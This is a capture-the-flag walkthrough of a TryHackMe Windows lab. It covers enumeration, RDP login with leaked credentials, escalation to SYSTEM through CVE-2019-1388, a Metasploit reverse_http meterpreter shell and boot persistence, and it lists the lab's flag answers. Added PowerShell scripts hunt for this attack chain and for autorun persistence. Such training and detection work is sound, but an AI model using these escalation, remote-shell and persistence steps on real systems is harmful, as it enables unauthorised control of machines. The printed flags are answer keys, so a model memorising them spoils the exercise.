Task 1 : Mission Start!
Throughout this room, we’ll be looking at alternative modes of exploitation without the use of Metasploit or really exploitation tools in general beyond nmap and dirbuster. To wrap up the room, we’ll be pivoting back to these tools for persistence and additional steps we can take. Without further delay, let’s deploy our target machine!
This room is a remix of my previous room Retro with some complications I added to that room having been removed. For increased difficulty and an exercise in patience, check that room out after this. In addition, this room is the sequel to Ice. — DarkStar7471
#1 Deploy the machine! This is a Windows box so give it a few minutes (3–5 at max) to come online.
You can deploy the machine.
Task 2 : Activate Forward Scanners and Launch Proton Torpedoes
Now that we’ve launched our target, let’s perform some basic enumeration of the services running on it!
#1 How many ports are open on our target system?
I started off with an nmap scan:
nmap -T4 -A -p- <target ip>
We can see 2 open ports 80/tcp and 3389/tcp.
ans : 2
#2 Looks like there’s a web server running, what is the title of the page we discover when browsing to it?
First I’ll head over to the webpage to check it out:
The page title is visible in the browser tab when we visit the site: IIS Windows Server.
ans : IIS Windows Server
#3 Interesting, let’s see if there’s anything else on this web server by fuzzing it. What hidden directory do we discover?
Fuzzing the web server with dirbuster turned up one hidden directory: /retro.
ans : /retro
#4 Navigate to our discovered hidden directory, what potential username do we discover?
Browsing through the site's posts, I could only see one username: “wade”.
ans : wade
#5 Crawling through the posts, it seems like our user has had some difficulties logging in recently. What possible password do we discover?
I went through the website and saw the password in a comment.
ans : parzival
#6 Log into the machine via Microsoft Remote Desktop (MSRDP) and read user.txt. What are its contents?
I used remmina to open an RDP session to the machine with the credentials wade:parzival.
user.txt is on the user's desktop.
ans : THM{HACK_PLAYER_ONE}
Task 3 : Breaching the Control Room
Now that we’ve gained access to our target system, let’s see if we can find a way to escalate. To start, let’s scout around the system to see if we can find anything of interest.
#1 When enumerating a machine, it’s often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?
I looked at the browser history on the system we accessed.
The recent searches reference CVE-2019-1388.
ans : CVE-2019-1388
#2 Looks like an executable file is necessary for exploitation of this vulnerability and the user didn’t really clean up very well after testing it. What is the name of this executable?
I found an undeleted file in the recycle bin.
ans : hhupd
#3 Research vulnerability and how to exploit it. Exploit it now to gain an elevated terminal!
I researched the vulnerability and found a YouTube video walking through the exploitation steps.
Show more details, then show information about the publisher's certificate.
Click the “Issued by” link.
Then exit the certificate dialog.
In the page that opens, press Ctrl+S.
From there we can open cmd, which runs with elevated privileges.
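The chain above (an elevated certificate dialog opening a browser as SYSTEM) leaves a distinctive process-creation trail. The following is an added example, not part of the original writeup, of hunting for it with Sysmon event ID 1 from a defender's side; it assumes Sysmon is installed and logging process creation, and the browser list is an assumption to extend as needed.

```powershell
# Added example (not from the original writeup): flag browser processes whose
# parent is consent.exe (the elevated UAC prompt) and that run as SYSTEM, the
# process pattern CVE-2019-1388 abuse produces. Assumes Sysmon is installed.
$browsers = @('iexplore.exe', 'msedge.exe', 'chrome.exe', 'firefox.exe')   # assumption: common browsers

$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Sysmon/Operational'
    Id      = 1
} -ErrorAction SilentlyContinue

foreach ($ev in $events) {
    # Read the named EventData fields from the event XML rather than relying
    # on field positions, which differ between Sysmon versions.
    $xml  = [xml]$ev.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    $image  = [IO.Path]::GetFileName($data['Image'])
    $parent = [IO.Path]::GetFileName($data['ParentImage'])

    if ($parent -ieq 'consent.exe' -and
        $browsers -contains $image -and
        $data['User'] -like '*\SYSTEM') {
        [PSCustomObject]@{
            Time    = $ev.TimeCreated
            Parent  = $data['ParentImage']
            Child   = $data['Image']
            User    = $data['User']
            Command = $data['CommandLine']
        }
    }
}
```

Any row returned warrants investigation, since consent.exe has no legitimate reason to launch a browser under the SYSTEM account.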
#4 Now that we’ve spawned a terminal, let’s go ahead and run the command ‘whoami’. What is the output of running this?
Running the Windows command “whoami” in the terminal we spawned shows which account we are running as.
ans : nt authority\system
#5 Now that we’ve confirmed that we have an elevated prompt, read the contents of root.txt on the Administrator’s desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task four!
We read root.txt from the Administrator's desktop using the elevated terminal.
ans : THM{COIN_OPERATED_EXPLOITATION}
Task 4 : Adoption into the Collective
Now that we’ve thoroughly compromised our target machine, let’s return to our exploitation tools so that we can gain remote shell access and persistence.
#1 Return to your attacker machine for this next bit. Since we know our victim machine is running Windows Defender, let’s go ahead and try a different method of payload delivery! For this, we’ll be using the script web delivery exploit within Metasploit. Launch Metasploit now and select ‘exploit/multi/script/web_delivery’ for use.
#2 First, let’s set the target to PSH (PowerShell). Which target number is PSH?
We found psh by doing show targets.
ans : 2
#3 After setting your payload, set your lhost and lport accordingly such that you know which port the MSF web server is going to run on and that it’ll be running on the TryHackMe network.
I set lhost to my TryHackMe VPN IP and lport to the port the Metasploit web server should listen on.
#4 Finally, let’s set our payload. In this case, we’ll be using a simple reverse HTTP payload. Do this now with the command: ‘set payload windows/meterpreter/reverse_http’. Following this, launch the attack as a job with the command ‘run -j’.
set payload windows/meterpreter/reverse_http
run -j
#5 Return to the terminal we spawned with our exploit. In this terminal, paste the command output by Metasploit after the job was launched. In this case, I’ve found it particularly helpful to host a simple python web server (python3 -m http.server) and host the command in a text file as copy and paste between the machines won’t always work. Once you’ve run this command, return to our attacker machine and note that our reverse shell has spawned.
I saved the command printed by Metasploit into a text file and served it with a simple python web server.
On the Windows machine, I fetched that file and ran the command in the elevated terminal.
Back on the attacker machine, the reverse shell connected and we have a meterpreter session.
#6 Last but certainly not least, let’s look at persistence mechanisms via Metasploit. What command can we run in our meterpreter console to setup persistence which automatically starts when the system boots? Don’t include anything beyond the base command and the option for boot startup.
The persistence script's -X option starts the agent when the system boots, so the command is run persistence -X.
ans : run persistence -X.
#7 Run this command now with options that allow it to connect back to your host machine should the system reboot. Note, you’ll need to create a listener via the handler exploit to allow for this remote connection in actual practice. Congrats, you’ve now gain full control over the remote host and have established persistence for further operations!
With the session and persistence in place, we have full control of the system.
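Persistence set up this way boots with the machine through an autorun entry, which is also where a defender should look for it. As an added example that is not part of the original writeup, this script audits the Run/RunOnce registry keys and flags entries that launch scripts from temporary or per-user directories; the pattern list is an assumption to tune for your environment.

```powershell
# Added example (not from the original writeup): audit the autorun registry
# keys used for boot/logon persistence and flag script-style entries that
# launch from Temp or AppData, which is typical of dropped persistence agents.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Assumption: indicators worth a closer look (script hosts, temp paths, encoded PowerShell)
$suspicious = '(?i)(\\Temp\\|\\AppData\\|\.vbs|wscript|cscript|powershell.*-e(nc|ncodedcommand)?\s)'

$findings = foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        # Skip the PS* metadata properties Get-ItemProperty adds to every object
        if ($p.Name -like 'PS*') { continue }
        [PSCustomObject]@{
            Key     = $key
            Name    = $p.Name
            Command = [string]$p.Value
            Verdict = if ([string]$p.Value -match $suspicious) { 'SUSPICIOUS' } else { 'ok' }
        }
    }
}

# Show flagged entries first so they stand out in a long autorun list
$findings | Sort-Object Verdict -Descending | Format-Table -AutoSize -Wrap
```

Removing a flagged entry and the file it points to is not enough on its own; the live session that installed it should be located and terminated as well.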
This box was really fun! I love the ones that have a story/theme that goes along with them.
Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!